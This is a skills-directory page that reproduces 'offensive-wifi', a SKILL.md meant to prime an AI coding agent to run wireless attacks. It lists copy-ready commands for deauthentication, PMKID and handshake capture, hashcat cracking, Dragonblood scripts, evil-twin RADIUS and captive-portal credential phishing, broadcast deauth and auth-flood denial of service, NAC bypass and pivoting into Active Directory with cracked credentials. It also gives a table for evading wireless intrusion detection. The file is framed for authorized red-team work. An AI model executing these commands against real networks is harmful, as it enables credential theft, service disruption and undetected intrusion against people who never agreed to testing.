Agent skill

Offensive Wifi

by SnailSploit in SnailSploit/Claude-Red

Wireless / 802.11 attack methodology for red team engagements and wireless security assessments.

MITAuto-check: notesSecurity

Install Offensive Wifi

skills CLI
$ npx skills add SnailSploit/Claude-Red --skill offensive-wifi -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install SnailSploit/Claude-Red offensive-wifi --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git skills-src && mkdir -p .claude/skills && cp -r skills-src/Skills/wireless/offensive-wifi .claude/skills/offensive-wifi && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
offensive-wifi
GitHub stars
7.3k
Token cost
~2.8k tokens
SKILL.md length
684 words
Files
1
Skills in repo
10
Repo updated
First seen
Licence
MIT

At a glance

Wireless / 802.11 attack methodology for red team engagements and wireless security assessments.

  • Works in 5 steps: Pick the right adapter (monitor mode +… → Recon airspace passively — never deauth… → Choose attack: handshake capture, PMKID,… → …
  • Scoping wireless pentest
  • SKILL.md covers Quick Workflow, Hardware & Adapter Selection, Reconnaissance and WPA / WPA2-PSK, plus 11 more sections
  • Calls git and python3; reaches github.com

What it does

Offensive Wifi is an agent skill from SnailSploit/Claude-Red. Wireless / 802.11 attack methodology for red team engagements and wireless security assessments. Covers monitor-mode setup, WPA/WPA2-PSK handshake capture and PMKID attacks, WPA3 SAE downgrade and Dragonblood, WPA-Enterprise (EAP) attacks (MSCHAPv2 cracking, EAP-TLS cert theft, evil-twin RADIUS), Karma / Known Beacons / Mana evil twin attacks, captive-portal phishing, KRACK and FragAttacks, WPS Pixie Dust, deauthentication and disassociation attacks, rogue AP construction (hostapd-mana), 802.1X bypass, MAC…

Its SKILL.md is about 2.8k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.

It sits in Security, covering Penetration testing, Security review and Red teaming and adversary simulation. The repository describes itself as: claude-red is a curated library of offensive security skills designed for the Claude skills system. Each skill is a structured SKILL.md file that primes Claude with expert-level… The licence is MIT.

When your agent uses it

  • Scoping wireless pentest
  • War-driving an estate
  • Testing corporate wireless segmentation

Example prompts

  • “/offensive-wifi”

Requirements

  • Python 3

Workflow steps

5 steps, taken from the first numbered list in SKILL.md.

  1. Pick the right adapter (monitor mode + injection + correct band/PHY for target)
  2. Recon airspace passively — never deauth before you know the topology
  3. Choose attack: handshake capture, PMKID, evil twin, KARMA, or WPS
  4. Crack offline; do not rely on online dictionary attacks
  5. If WPA-Enterprise, pivot through stolen creds or rogue RADIUS

What it can do on your machine

Read from SKILL.md and the folder at commit 739512a. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Shell commands in SKILL.md call:

    • git
    • python3

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    Hosts in commands or code, which the agent is likely to contact:

    • github.com

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Offensive Wifi loads about 2.8k tokens when it runs. Until then it costs about 180 tokens; SKILL.md has 684 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~180
When it runs · the whole SKILL.md, loaded when a task matches
~2.8k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check: notes

The automated check noted patterns worth knowing about, such as sudo or a known installer.

  • NoteRuns commands with sudoSKILL.md:30
    sudo airmon-ng check kill
  • NoteRuns commands with sudoSKILL.md:31
    sudo airmon-ng start wlan0
  • NoteRuns commands with sudoSKILL.md:32
    sudo aireplay-ng --test wlan0mon
  • NoteRuns commands with sudoSKILL.md:42
    sudo airodump-ng wlan0mon --band abg
  • NoteRuns commands with sudoSKILL.md:45
    sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon
  • NoteRuns commands with sudoSKILL.md:48
    sudo airodump-ng -c 6 --essid-regex "." wlan0mon
  • NoteRuns commands with sudoSKILL.md:64
    sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon
  • NoteRuns commands with sudoSKILL.md:67
    sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
  • NoteRuns commands with sudoSKILL.md:81
    sudo hcxdumptool -i wlan0mon -o pmkid.pcapng \
  • NoteRuns commands with sudoSKILL.md:122
    sudo mdk4 wlan0mon a -a AA:BB:CC:DD:EE:FF -m -s 1024

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from SnailSploit/Claude-Red at commit 739512a, republished under its MIT licence (© SnailSploit). 684 words, ~2,756 tokens.

Download SKILL.mdSave it as .claude/skills/offensive-wifi/SKILL.md (or your agent's skills folder).
name
offensive-wifi
description
Wireless / 802.11 attack methodology for red team engagements and wireless security assessments. Covers monitor-mode setup, WPA/WPA2-PSK handshake capture and PMKID attacks, WPA3 SAE downgrade and Dragonblood, WPA-Enterprise (EAP) attacks (MSCHAPv2 cracking, EAP-TLS cert theft, evil-twin RADIUS), Karma / Known Beacons / Mana evil twin attacks, captive-portal phishing, KRACK and FragAttacks, WPS Pixie Dust, deauthentication and disassociation attacks, rogue AP construction (hostapd-mana), 802.1X bypass, MAC randomization defeat, BLE/Zigbee/IEEE 802.15.4 sidebands, and Wi-Fi 6/6E/7 considerations. Use when scoping wireless pentest, war-driving an estate, or testing corporate wireless segmentation.

Wireless / 802.11 — Offensive Testing Methodology

Quick Workflow

  1. Pick the right adapter (monitor mode + injection + correct band/PHY for target)
  2. Recon airspace passively — never deauth before you know the topology
  3. Choose attack: handshake capture, PMKID, evil twin, KARMA, or WPS
  4. Crack offline; do not rely on online dictionary attacks
  5. If WPA-Enterprise, pivot through stolen creds or rogue RADIUS

Hardware & Adapter Selection

ChipsetStrengthsNotes
Atheros AR9271 (Alfa AWUS036NHA)Solid 2.4 GHz monitor + injection802.11n only
Realtek RTL8812AU (AWUS036ACH)Dual-band, injectionDriver: aircrack-ng/rtl8812au
MediaTek MT7612U (AWUS036ACM)Stable dual-bandModern kernels in-tree
MediaTek MT7921AUWi-Fi 6 monitor (limited)Patched drivers required
AWUS036AXML / AXMWi-Fi 6E (6 GHz)Bleeding edge — verify per release
bash
# Verify monitor + injection
sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo aireplay-ng --test wlan0mon
iw list | grep -A 8 "Supported interface modes"

Reconnaissance

bash
# Multi-channel discovery (all bands)
sudo airodump-ng wlan0mon --band abg

# Targeted on a known channel/BSSID
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon

# Hidden SSID — wait for client probe or force deauth
sudo airodump-ng -c 6 --essid-regex "." wlan0mon

# Wigle / Kismet for war-driving
kismet -c wlan0mon

Key data to record: BSSID, ESSID, channel, encryption, PMF status, client list, RSSI, vendor OUI.


WPA / WPA2-PSK

Four-way Handshake Capture
bash
# Targeted capture
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon

# Force a reconnect (deauth one client, do not blanket the AP)
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

Verify the EAPOL frames are usable:

bash
hcxpcapngtool -o hash.hc22000 handshake-01.cap
PMKID (No Client Required)

PMKID lives in the first AP-to-station message — you can grab it without anyone connected.

bash
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng \
  --enable_status=1 --filterlist_ap=targets.txt --filtermode=2

hcxpcapngtool -o hash.hc22000 pmkid.pcapng
Cracking
bash
# GPU dictionary attack
hashcat -m 22000 hash.hc22000 wordlist.txt -r rules/OneRuleToRuleThemAll.rule

# Mask attack (e.g. carrier defaults: 10 digits)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d

# Known SSID-based defaults (e.g. UPC, Sky, BTHub generators)
upc_keys ESSID | hashcat -m 22000 hash.hc22000 -

WPA3 / SAE

Transition-Mode Downgrade

If the AP advertises both WPA2 and WPA3 (transition mode), force clients onto WPA2 by spoofing an RSN-only beacon and capturing as PSK.

Dragonblood (CVE-2019-9494/9495/13377)

Side-channel and downgrade attacks on SAE. Older hostapd (<2.10) with insufficient curve diversification leaks password elements via timing/cache attacks.

bash
# Reference implementation
git clone https://github.com/vanhoefm/dragonblood
python3 dragondrain.py wlan0mon AA:BB:CC:DD:EE:FF
python3 dragontime.py --bssid AA:BB:CC:DD:EE:FF --iface wlan0mon
SAE Auth Flooding (Resource Exhaustion)
bash
sudo mdk4 wlan0mon a -a AA:BB:CC:DD:EE:FF -m -s 1024
# Triggers heavy crypto on AP CPU; can DoS lower-end deployments

WPA-Enterprise (802.1X / EAP)

Method Identification
bash
# Watch initial EAP-Request/Identity to fingerprint method
tshark -i wlan0mon -Y "eapol || eap" -V
Inner MethodAttack
EAP-MSCHAPv2 (PEAP/TTLS)Crack NetNTLMv1-style challenge offline
EAP-GTCCleartext password — capture via rogue RADIUS
EAP-TLSSteal client cert (often in user keychain / DPAPI / NDES)
EAP-PWDDragonblood-class side channels
Evil-Twin RADIUS (MSCHAPv2 / GTC)
bash
# eaphammer — automated rogue AP + RADIUS
eaphammer -i wlan0 --essid CorpWiFi --bssid AA:BB:CC:DD:EE:FF \
  --auth wpa-eap --creds

# Captured hashes → asleap or hashcat -m 5500
asleap -C challenge -R response -W wordlist.txt

Critical: organizations that don't pin server cert + CN on supplicants are vulnerable. Win10/11 with ServerValidation disabled (common for BYOD) will hand over creds.

EAP-TLS Cert Theft Paths
  • DPAPI master key + cert blob from user profile (%APPDATA%\Microsoft\SystemCertificates)
  • NDES misconfig (ESC8-class cert request abuse)
  • ADCS user auto-enrollment template with weak ACL

WPS

Pixie Dust (Offline)
bash
# Capture WPS exchange
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1 -vvv
# Or
bully -b AA:BB:CC:DD:EE:FF -d -v 3 wlan0mon

Vulnerable chipsets: Ralink, Realtek, Broadcom (older firmware), MediaTek (specific revs). Pixiewps recovers PIN in seconds when nonces are predictable.

Online PIN Brute (Last Resort)
bash
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -L -N -d 15 -t 30 -T .5 -r 3:30
# Most modern APs lock out after a few failures — slow and noisy

Evil Twin / KARMA / Mana

Stock Evil Twin (Captive Portal)
bash
# wifiphisher — automated AP + phishing portal
sudo wifiphisher --essid CorpWiFi --noextensions --force-hostapd

# airgeddon — interactive menu (good for one-off engagements)
sudo airgeddon
KARMA / Mana (Probe Exploitation)

Older stations broadcast PNL (Preferred Network List) probes. KARMA replies "yes" to anything; Mana picks one realistic ESSID and answers consistently to defeat MAC randomization.

bash
# hostapd-mana
sudo hostapd-mana ./mana.conf

# Combine with rogue RADIUS for enterprise nets
eaphammer -i wlan0 --known-beacons --known-ssids-file ssids.txt \
  --auth wpa-eap --creds --hostile-portal
MAC Randomization Defeat

iOS/Android randomize MACs but leak per-SSID stable IDs. Cluster probes by sequence number and timing to re-identify devices.


KRACK & FragAttacks

AttackClassTarget
KRACK (CVE-2017-13077..082)Key reinstallationUnpatched WPA2 supplicants
FragAttacks (CVE-2020-24586..588)Fragmentation/aggregationMost pre-2021 implementations

Test a network's patch status:

bash
# Vanhoef test scripts
git clone https://github.com/vanhoefm/krackattacks-scripts
./krack-test-client.py
git clone https://github.com/vanhoefm/fragattacks
./test-fragattacks.py wlan0

Show full SKILL.md (274 more words)Show less

Deauth / Disassociation Attacks

bash
# Single client deauth (use for handshake capture)
aireplay-ng --deauth 3 -a AP -c CLIENT wlan0mon

# Broadcast (DoS — only with explicit authorization)
mdk4 wlan0mon d -B target_bssids.txt

# Disassoc + auth flood combo (kicks then prevents reconnect)
mdk4 wlan0mon a -a AP_BSSID -m

802.11w (PMF) blocks unencrypted deauth. Most modern enterprise APs require it. Clients without PMF support are still kickable via Action frames.


802.1X / Wired NAC Bypass (Adjacent)

bash
# Sniff valid 802.1X exchange on wired side
tcpdump -i eth0 -w nac.pcap ether proto 0x888e

# silentbridge / nac_bypass — transparently bridge through an authenticated host
git clone https://github.com/s0lst1c3/silentbridge
silentbridge --takeover --phy wlan0  # variants for wired

Wi-Fi 6 / 6E / 7 Considerations

  • 6 GHz (Wi-Fi 6E) disables WPA2-only; WPA3 + PMF mandatory. Many attacks are mitigated by spec.
  • OFDMA / MU-MIMO: legacy injection often misaligns with RU allocations — verify packet delivery on test bench.
  • TWT (Target Wake Time): deauth windows differ; observe BA sessions before injecting.
  • MLO (Wi-Fi 7): a single client over multiple links — capture must cover all links to recover full session.

Sidebands & Adjacent Wireless

TechToolNotes
Bluetooth Classicredfang, crackle, btproxyLMP/L2CAP fuzzing
BLEbettercap, Sniffle (TI CC1352), FrontlineGATT enumeration, LE Secure Connections downgrade
Zigbee / 802.15.4KillerBee, apimote, ATUSBTouchlink commissioning abuse
Z-WaveZ-Force, EZ-WaveS0 key reuse bug class
LoRa / LoRaWANLoRaPWN, ChirpStackJoin-request replay, ABP key reuse
433/868 MHz (Sub-GHz)HackRF / Flipper ZeroGarage doors, doorbells, telemetry

RADIUS / Backend Pivots Post-Compromise

bash
# If you crack a domain user via PEAP-MSCHAPv2, pivot to AD
nxc smb dc -u captured_user -p cracked_pass --pass-pol

# If RADIUS server is stand-alone (FreeRADIUS), check users file & MOTP secrets
# If on Windows NPS, pivot via the service account context

Engagement Cheatsheet

bash
# 1. Setup
sudo airmon-ng check kill && sudo airmon-ng start wlan0
sudo iw reg set US

# 2. Recon (do not deauth yet)
sudo airodump-ng wlan0mon --band abg --write recon

# 3. PMKID sweep (passive)
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1

# 4. Targeted capture if PMKID empty
sudo airodump-ng -c <ch> --bssid <AP> -w cap wlan0mon &
sudo aireplay-ng --deauth 3 -a <AP> -c <client> wlan0mon

# 5. Crack offline
hashcat -m 22000 hash.hc22000 wordlist.txt -r best64.rule

# 6. If enterprise → eaphammer evil twin
# 7. Document SSID, BSSID, channel, RSSI, encryption, attack used, time

Detection / Defender View

AP/WIDS DetectorTriggerEvasion
Excessive deauth>5 deauth/sec from one source MACSpread across spoofed MACs, target individuals
Rogue AP detectionUnauthorized BSSID on monitored channelMatch real BSSID's beacon timing/IE order exactly
Karma response anomalyAP answering all probe SSIDsUse Mana mode, pick one plausible SSID
WPS lockoutRepeated PIN failuresPixie Dust offline only, abandon online brute
RADIUS log: cert mismatchSupplicant rejects evil-twin certUse copies of victim CA-signed certs (unlikely)

Key References

© SnailSploit, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

Just SKILL.md in Skills/wireless/offensive-wifi of SnailSploit/Claude-Red.

Open the folder on GitHubat commit 739512a

Compare with similar skills

Offensive Wifi next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Offensive Wifi compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Offensive Wifi this skillSnailSploit/Claude-Red7.3k—~2.8kAutomated safety check: NotesMIT
Strix Code Vulnerability Scanusestrix/strix67k—~1.1kAutomated safety check: PassApache-2.0
Code Audit3stoneBrother/code-audit8931 repos~2.7kAutomated safety check: PassNone
Wooyun Legacytanweai/wooyun-legacy1.8k—~1.9kAutomated safety check: PassCustom licence
Penetration Flowlingbol088-spec/ReiPenFlow222—~1.8kAutomated safety check: PassMIT
Myrqenstijnswapped/Myrqen137—~2.1kAutomated safety check: PassCustom licence

Similar skills

  • Runs a Strix white-box security review that reads the source, then exploits what it finds in a sandbox so each reported issue has a proof-of-concept.

    67k GitHub stars~1.1k tokensUpdated today
    SecurityAuto-check passed
  • Code Audit

    3stoneBrother/code-audit

    Professional code security audit skill covering 55+ vulnerability types.

    893 GitHub starsUsed in 1 repo~2.7k tokens
    SecurityAuto-check passed
  • Wooyun Legacy

    tanweai/wooyun-legacy

    WooYun business logic vulnerability methodology — 22,132 real cases across 6 domains (authentication bypass, authorization bypass, payment tampering, information disclosure, logic flaws…

    1.8k GitHub stars~1.9k tokensUpdated 2 mo ago
    SecurityAuto-check passed
  • Penetration Flow

    lingbol088-spec/ReiPenFlow

    Guided workflow for authorized penetration testing, vulnerability validation, security reporting, CTF/local sandbox reverse engineering, and user-directed vulnerability research.

    222 GitHub stars~1.8k tokensUpdated 2 mo ago
    SecurityAuto-check passed
  • Myrqen

    stijnswapped/Myrqen

    Run an authorized, local-first application security assessment on the current project using this agent's own reasoning.

    137 GitHub stars~2.1k tokensUpdated 1 mo ago
    SecurityAuto-check passed
  • Gha Security Review

    getsentry/skills

    Official

    GitHub Actions security review for workflow exploitation vulnerabilities.

    1k GitHub starsUsed in 3 repos~2.2k tokens
    SecurityAuto-check: notes

More from SnailSploit/Claude-Red

All 10 skills in this repo
  • Offensive Krack Fragattacks

    SnailSploit/Claude-Red

    KRACK (CVE-2017-13077..082) and FragAttacks (CVE-2020-24586..588 + 26139-26147) — key reinstallation, fragmentation, and aggregation attacks against WPA2 supplicants.

    7.3k GitHub stars~1.1k tokensUpdated 18 days ago
    Auto-check: notes
  • Offensive Fuzzing

    SnailSploit/Claude-Red

    Practical offensive fuzzing methodology covering target identification, fuzzer selection (AFL++, libFuzzer, Honggfuzz, Boofuzz, syzkaller), harness writing, corpus curation, mutation strategies…

    7.3k GitHub stars~3k tokensUpdated 18 days ago
    Auto-check: warnings
  • Offensive Lorawan Sub Ghz

    SnailSploit/Claude-Red

    LoRaWAN and sub-GHz (433 / 868 / 915 MHz) attack methodology — LoRaWAN ABP/OTAA join attack, network/session key reuse, frame counter replay, downlink injection on TTN/Helium-style networks, sub-GHz…

    7.3k GitHub stars~1.7k tokensUpdated 18 days ago
    Auto-check passed
  • Offensive Mobile

    SnailSploit/Claude-Red

    Mobile (Android + iOS) application penetration testing methodology.

    7.3k GitHub stars~3.5k tokensUpdated 18 days ago
    Auto-check passed
  • Offensive Wps

    SnailSploit/Claude-Red

    WPS (Wi-Fi Protected Setup) PIN attack methodology — Pixie Dust offline attack against vulnerable chipsets (Ralink, Realtek, Broadcom, MediaTek), online PIN brute-force with reaver/bully, lockout…

    7.3k GitHub stars~1.5k tokensUpdated 18 days ago
    Auto-check: notes
  • Offensive Z Wave

    SnailSploit/Claude-Red

    Z-Wave attack methodology — sniffing with Z-Force / EZ-Wave / RTL-SDR + ZniffMobile, S0 (legacy) network-key derivation flaw and key reuse, S2 (modern) ECDH commissioning analysis, replay/injection…

    7.3k GitHub stars~1.3k tokensUpdated 18 days ago
    Auto-check passed

Categories

Questions about Offensive Wifi

What does Offensive Wifi do?

Wireless / 802.11 attack methodology for red team engagements and wireless security assessments. Offensive Wifi is an agent skill from SnailSploit/Claude-Red.11 attack methodology for red team engagements and wireless security assessments.

When should I use Offensive Wifi?

Offensive Wifi fits situations like: scoping wireless pentest; war-driving an estate; testing corporate wireless segmentation.

How do I install Offensive Wifi in Claude Code?

Run `npx skills add SnailSploit/Claude-Red --skill offensive-wifi -a claude-code`. Or copy the skill folder (Skills/wireless/offensive-wifi in SnailSploit/Claude-Red) into .claude/skills/offensive-wifi in your project. Claude Code loads it when a task matches its description.

How do I install Offensive Wifi in Codex?

Run `npx skills add SnailSploit/Claude-Red --skill offensive-wifi -a codex`. Or copy the skill folder (Skills/wireless/offensive-wifi in SnailSploit/Claude-Red) into .agents/skills/offensive-wifi in your project. Codex loads it when a task matches its description.

Can I use Offensive Wifi in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add SnailSploit/Claude-Red --skill offensive-wifi -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/offensive-wifi, .gemini/skills/offensive-wifi, .github/skills/offensive-wifi and .opencode/skills/offensive-wifi in your project.

What does Offensive Wifi need to run?

Going by SKILL.md and its folder, Offensive Wifi needs the command-line tools its instructions call (git and python3). Our summary lists: Python 3.

Does Offensive Wifi access the network?

SKILL.md names 1 domain. In commands or code: github.com; the agent is likely to contact it when it follows the instructions. This is read from the text; nothing was executed.

Is Offensive Wifi safe to install?

Our automated static check of SKILL.md found notes only (runs commands with sudo), nothing it rates as a warning. It is not a guarantee. Review the folder before installing.

What licence does Offensive Wifi use?

Offensive Wifi is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Offensive Wifi use?

About 2.8k tokens (SKILL.md is roughly 11k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to Offensive Wifi?

Skills that share tags, products or a category with Offensive Wifi: Strix Code Vulnerability Scan (usestrix/strix, 67k stars), Code Audit (3stoneBrother/code-audit, 893 stars), Wooyun Legacy (tanweai/wooyun-legacy, 1.8k stars) and Penetration Flow (lingbol088-spec/ReiPenFlow, 222 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Offensive Wifi?

SnailSploit (a GitHub user) maintains it in SnailSploit/Claude-Red, which has 7,340 GitHub stars. The repository holds 10 skills in this directory. The repository was last updated on September 19, 2026.

Source: SnailSploit/Claude-Red on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.